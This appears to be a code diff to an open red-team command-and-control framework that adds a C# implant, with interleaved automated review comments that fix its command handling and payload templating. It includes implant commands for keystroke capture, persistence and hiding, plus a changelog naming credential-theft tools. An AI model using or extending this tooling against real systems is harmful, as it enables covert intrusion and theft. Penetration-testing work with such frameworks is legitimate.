UXCOMMANDS = ["unhide-implant","hide-implant","help","searchhelp","python","loadmodule","loadmoduleforce","get-keystrokes","back","upload-file","download-file","install-persistence","remove-persistence","sai","startanotherimplant-keepfile","get-screenshot","startanotherimplant","pwd","id","ps","setbeacon","kill-implant"]
|
||||||
|
|
||||||
|
SHARPCOMMANDS = ["unhide-implant","ls","pwd","dir","start-process", "hide-implant","help","searchhelp","listmodules","loadmodule","loadmoduleforce","back","ps","beacon","setbeacon","kill-implant"]
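Review bot: `sharp_help1` lists `listmodule` while the `searchhelp listmodules` example in the same string, SHARPCOMMANDS in the second hunk and the implant's command check all use `listmodules`, so the help advertises a name the implant does not match; change the help line to `listmodules`. A short comment above the string, such as `# Help text for the C# implant; keep in sync with SHARPCOMMANDS below`, would make the coupling between the two hunks explicit.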
|
||||||
|
|
|
@ -31,6 +31,13 @@ class Implant(object):
|
||||||
self.ServerURL = new_serverurl = select_item("HostnameIP", "C2Server")
|
self.ServerURL = new_serverurl = select_item("HostnameIP", "C2Server")
|
||||||
self.AllBeaconURLs = get_otherbeaconurls()
|
self.AllBeaconURLs = get_otherbeaconurls()
|
||||||
self.AllBeaconImages = get_images()
|
self.AllBeaconImages = get_images()
|
||||||
|
self.SharpCore = """
|
||||||
|
RANDOMURI19901%s10991IRUMODNAR
|
||||||
|
URLS10484390243%s34209348401SLRU
|
||||||
|
KILLDATE1665%s5661ETADLLIK
|
||||||
|
SLEEP98001%s10089PEELS
|
||||||
|
NEWKEY8839394%s4939388YEKWEN
|
||||||
|
IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDate, self.Sleep, self.Key, self.AllBeaconImages)
|
||||||
with open("%spy_dropper.py" % (PayloadsDirectory), 'rb') as f:
|
with open("%spy_dropper.py" % (PayloadsDirectory), 'rb') as f:
|
||||||
self.PythonImplant = base64.b64encode(f.read())
|
self.PythonImplant = base64.b64encode(f.read())
|
||||||
self.PythonCore = """import urllib2, os, subprocess, re, datetime, time, base64, string, random
|
self.PythonCore = """import urllib2, os, subprocess, re, datetime, time, base64, string, random
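Review bot: the field markers in SharpCore (`RANDOMURI19901…10991IRUMODNAR` and the five that follow) are duplicated literally in the Regex patterns of the C# implant's primer(), with nothing on either side pointing at the other; a comment such as `# Field markers must match the Regex patterns in Files/Sharp.cs primer(); change both together.` above the assignment would save the next maintainer a search. Whether get_otherbeaconurls() and get_images() return strings or lists is not visible here, so the `%` formatting of AllBeaconURLs and AllBeaconImages is assumed to produce the comma-separated quoted form the implant splits on — worth confirming. The enclosing `__init__` starts and ends outside the hunk.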
|
||||||
|
|
|
@ -491,6 +491,67 @@ def runcommand(command, randomuri):
|
||||||
new_task(command, randomuri)
|
new_task(command, randomuri)
|
||||||
return
|
return
|
||||||
|
|
||||||
|
elif implant_type == "C#":
|
||||||
|
if "searchhelp" in command.lower():
|
||||||
|
searchterm = (command.lower()).replace("searchhelp ","")
|
||||||
|
import string
|
||||||
|
helpfull = string.split(sharp_help1, '\n')
|
||||||
|
for line in helpfull:
|
||||||
|
if searchterm in line:
|
||||||
|
print (line)
|
||||||
|
|
||||||
|
elif "unhide-implant" in command.lower():
|
||||||
|
unhide_implant(randomuri)
|
||||||
|
|
||||||
|
elif "hide-implant" in command.lower():
|
||||||
|
kill_implant(randomuri)
|
||||||
|
|
||||||
|
elif "kill-implant" in command.lower() or "exit" in command.lower():
|
||||||
|
impid = get_implantdetails(randomuri)
|
||||||
|
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
|
||||||
|
if ri.lower() == "n":
|
||||||
|
print ("Implant not terminated")
|
||||||
|
if ri == "":
|
||||||
|
pid = get_pid(randomuri)
|
||||||
|
new_task("exit",randomuri)
|
||||||
|
kill_implant(randomuri)
|
||||||
|
if ri.lower() == "y":
|
||||||
|
pid = get_pid(randomuri)
|
||||||
|
new_task("exit" % pid,randomuri)
|
||||||
|
kill_implant(randomuri)
|
||||||
|
|
||||||
|
elif (command.lower() == "ps") or (command.lower() == "ps "):
|
||||||
|
check_module_loaded("Get-ProcessList.dll", randomuri)
|
||||||
|
new_task(command,randomuri)
|
||||||
|
|
||||||
|
elif "loadmoduleforce" in command.lower():
|
||||||
|
params = re.compile("loadmoduleforce ", re.IGNORECASE)
|
||||||
|
params = params.sub("", command)
|
||||||
|
check_module_loaded(params, randomuri, force=True)
|
||||||
|
|
||||||
|
elif "loadmodule" in command.lower():
|
||||||
|
params = re.compile("loadmodule ", re.IGNORECASE)
|
||||||
|
params = params.sub("", command)
|
||||||
|
check_module_loaded(params, randomuri)
|
||||||
|
|
||||||
|
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
|
||||||
|
print (sharp_help1)
|
||||||
|
|
||||||
|
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
|
||||||
|
startup()
|
||||||
|
|
||||||
|
elif ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
|
||||||
|
new_task(command, randomuri)
|
||||||
|
command = command.replace('set-beacon ', '')
|
||||||
|
command = command.replace('setbeacon ', '')
|
||||||
|
command = command.replace('beacon ', '')
|
||||||
|
update_sleep(command, randomuri)
|
||||||
|
|
||||||
|
else:
|
||||||
|
if command:
|
||||||
|
new_task(command, randomuri)
|
||||||
|
return
|
||||||
|
|
||||||
else:
|
else:
|
||||||
try:
|
try:
|
||||||
check_module_loaded("Implant-Core.ps1", randomuri)
|
check_module_loaded("Implant-Core.ps1", randomuri)
|
||||||
|
@ -929,6 +990,11 @@ def commandloop(implant_id):
|
||||||
readline.set_completer_delims('\t')
|
readline.set_completer_delims('\t')
|
||||||
readline.parse_and_bind("tab: complete")
|
readline.parse_and_bind("tab: complete")
|
||||||
readline.set_completer(t.listCompleter)
|
readline.set_completer(t.listCompleter)
|
||||||
|
if hostname[15] == 'C#':
|
||||||
|
t.createListCompleter(SHARPCOMMANDS)
|
||||||
|
readline.set_completer_delims('\t')
|
||||||
|
readline.parse_and_bind("tab: complete")
|
||||||
|
readline.set_completer(t.listCompleter)
|
||||||
print (Colours.GREEN)
|
print (Colours.GREEN)
|
||||||
print ("%s @ %s (PID:%s)" % (hostname[11],hostname[3],hostname[8]))
|
print ("%s @ %s (PID:%s)" % (hostname[11],hostname[3],hostname[8]))
|
||||||
command = raw_input("%s> " % (implant_id))
|
command = raw_input("%s> " % (implant_id))
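Review bot: `new_task("exit" % pid,randomuri)` in the kill-implant branch of runcommand raises TypeError (not all arguments converted during string formatting) when the user answers "y", because `"exit"` has no format specifier, so the exit task is never queued on that path while the empty-answer path works; change it to `new_task("exit", randomuri)` as in the branch above it, after which `pid` is unused in both. `"exit" in command.lower()` is also a substring test, so any command containing the word exit enters the kill prompt. In the commandloop hunk, the three readline calls under `if hostname[15] == 'C#':` repeat the ones executed immediately above; only `t.createListCompleter(SHARPCOMMANDS)` needs to be conditional. Both runcommand and commandloop extend outside their hunks.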
|
||||||
|
|
File diff suppressed because one or more lines are too long
Binary file not shown.
|
@ -1,5 +1,13 @@
|
||||||
function SSLInspectionCheck($url, $proxyurl, $proxyuser, $proxypass){
|
function SSLInspectionCheck($url, $proxyurl, $proxyuser, $proxypass){
|
||||||
|
|
||||||
|
$expiration = $null
|
||||||
|
$certName = $null
|
||||||
|
$certPublicKeyString = $null
|
||||||
|
$certSerialNumber = $null
|
||||||
|
$certThumbprint = $null
|
||||||
|
$certEffectiveDate = $null
|
||||||
|
$certIssuer = $null
|
||||||
|
|
||||||
write-output "Checking $($url)"
|
write-output "Checking $($url)"
|
||||||
$req = [Net.HttpWebRequest]::Create($url)
|
$req = [Net.HttpWebRequest]::Create($url)
|
||||||
|
|
||||||
|
|
Binary file not shown.
75
Payloads.py
75
Payloads.py
File diff suppressed because one or more lines are too long
8
Tasks.py
8
Tasks.py
|
@ -35,10 +35,16 @@ def newTask(path):
|
||||||
if a[2].startswith("loadmodule"):
|
if a[2].startswith("loadmodule"):
|
||||||
try:
|
try:
|
||||||
module_name = (a[2]).replace("loadmodule ","")
|
module_name = (a[2]).replace("loadmodule ","")
|
||||||
|
if ".exe" in module_name:
|
||||||
|
modulestr = load_module_sharp(module_name)
|
||||||
|
elif ".dll" in module_name:
|
||||||
|
modulestr = load_module_sharp(module_name)
|
||||||
|
else:
|
||||||
modulestr = load_module(module_name)
|
modulestr = load_module(module_name)
|
||||||
command = "loadmodule%s" % modulestr
|
command = "loadmodule%s" % modulestr
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
print "Cannot find module, loadmodule is case sensitive!"
|
print "Cannot find module, loadmodule is case sensitive!"
|
||||||
|
print e
|
||||||
if commands:
|
if commands:
|
||||||
commands += "!d-3dion@LD!-d" + command
|
commands += "!d-3dion@LD!-d" + command
|
||||||
else:
|
else:
|
||||||
|
@ -47,8 +53,6 @@ def newTask(path):
|
||||||
|
|
||||||
if commands is not None:
|
if commands is not None:
|
||||||
multicmd = "multicmd%s" % commands
|
multicmd = "multicmd%s" % commands
|
||||||
|
|
||||||
|
|
||||||
try:
|
try:
|
||||||
responseVal = encrypt(EncKey, multicmd)
|
responseVal = encrypt(EncKey, multicmd)
|
||||||
except Exception as e:
|
except Exception as e:
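Review bot: the `.exe` and `.dll` branches added to newTask in the first hunk both call `load_module_sharp(module_name)`, so one condition, `if ".exe" in module_name or ".dll" in module_name:`, replaces the pair with the same semantics. Because these are substring tests rather than suffix tests, a module name that merely contains ".dll" or ".exe" elsewhere in its name (a constructed example: `Foo.dllhelper.ps1`) would be base64-encoded instead of read as text; `module_name.endswith((".exe", ".dll"))` would be tighter, hedged because the module catalogue is not visible here. newTask continues outside the hunk.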
|
||||||
|
|
|
@ -1,5 +1,20 @@
|
||||||
|
4.6 (26/12/18)
|
||||||
|
==============
|
||||||
|
Added Sharp Implant and corresponding DLLs/Shellcode
|
||||||
|
|
||||||
4.5 (19/11/18)
|
4.5 (19/11/18)
|
||||||
==============
|
==============
|
||||||
|
Removed Invoke-Enum
|
||||||
|
Merged Get-TokenElevationType.ps1 by jmhickman
|
||||||
|
Added TLS Config to Python Server
|
||||||
|
Updated README
|
||||||
|
Updated Get-IPAddress
|
||||||
|
Merged OfflineReportGenerator.py by skahwah
|
||||||
|
Updated to latest PowerUp.ps1
|
||||||
|
Updated INSTALL notes
|
||||||
|
Updated to work with FIPSAlgorithmPolicy
|
||||||
|
Updated to latest Invoke-Kerberoast & Invoke-Mimikatz
|
||||||
|
Removed process start for Netsh.exe on non migrate executable
|
||||||
|
|
||||||
4.4 (10/11/18)
|
4.4 (10/11/18)
|
||||||
==============
|
==============
|
||||||
|
|